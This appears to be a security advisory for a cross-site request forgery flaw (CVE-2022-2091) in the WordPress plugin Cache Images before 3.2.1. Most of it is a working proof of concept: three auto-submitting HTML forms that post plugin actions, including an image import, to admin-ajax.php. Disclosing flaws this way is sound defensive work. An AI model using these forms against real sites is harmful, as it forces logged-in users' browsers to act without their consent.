Cache Images < 3.2.1 – Image Upload / Import via CSRF | CVE 2022-2091

Description

The plugin does not implement nonce checks, which could allow attackers to make any logged user upload images via a CSRF attack.

Proof of Concept

Allows import of any images with any user level. 

<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="cache_images">
    <input type="text" name="do" value="getlist">
    <input type="text" name="domain" value="example.com">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="cache_images">
    <input type="text" name="do" value="getdomains">
</form>
<script>
    document.getElementById("test").submit();
</script>


<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="cache_images">
    <input type="text" name="do" value="regen">
    <input type="text" name="url" value="https://heise.cloudimg.io/v7/_www-heise-de_/imgs/18/3/4/8/4/2/6/8/shutterstock_1124819546_jpg.jpg-d3889c815ce30778.jpeg?org_if_sml=1&q=30&width=1032">
    <input type="text" name="postid" value="2">
</form>
<script>
    document.getElementById("test").submit();
</script>